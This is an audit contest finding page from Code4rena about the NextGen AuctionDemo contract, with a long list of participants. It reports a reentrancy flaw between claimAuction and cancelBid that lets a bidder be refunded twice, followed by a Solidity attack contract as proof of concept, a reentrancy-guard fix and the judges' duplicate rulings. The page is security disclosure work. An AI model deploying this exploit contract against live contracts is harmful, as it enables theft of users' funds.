Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 207/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L116 https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L128
The bidder can get his bid amount earned twice by applying an illegal reentrancy between AuctionDemo.claimAuction and AuctionDemo.cancelBid
A reentrancy can be applied between AuctionDemo.claimAuction and AuctionDemo.cancelBid,
PoC :
interface IAuctionDemo { function claimAuction(uint256) external; function cancelBid(uint256) external; function participateToAuction(uint256) external payable; } contract attack { bool triggred; address owner; IAuctionDemo vuln; uint256 id; constructor(IAuctionDemo _vuln, uint256 _id) { owner = msg.sender; vuln = _vuln; id = _id; } function initiate() external payable { vuln.participateToAuction{value:msg.value}(id); } function exploit() external { vuln.claimAuction(id); } fallback() external payable { // to avoid calls over 2 which will reverts on bid cancelation requirements if(msg.sender == address(vuln)) { if(!triggred) { triggred = true; vuln.cancelBid(id); } } } receive() external payable { if(msg.sender == address(vuln)) { if(!triggred) { triggred = true; vuln.cancelBid(id); } } } }
Cause : both functions make a check of timestamp with >= and =< to the auction time of the bid id (lines 125, 105), bidder is only allowed to get his bid amount by either of canceling and claiming, however he can get his bid with both when the the auction time is equal to block.timestamp, calling both functions will be validated,
The bug to be exploited successfully the reentrancy must be triggered when block.timestamp is equal to minter.getAuctionEndTime(_tokenid)
Remix IDE
Impliment reentrancy guard on AuctionDemo.claimAuction and AuctionDemo.cancelBid functions
Reentrancy
#0 - c4-pre-sort
2023-11-17T14:55:03Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:40:04Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T18:20:47Z
alex-ppg marked the issue as partial-50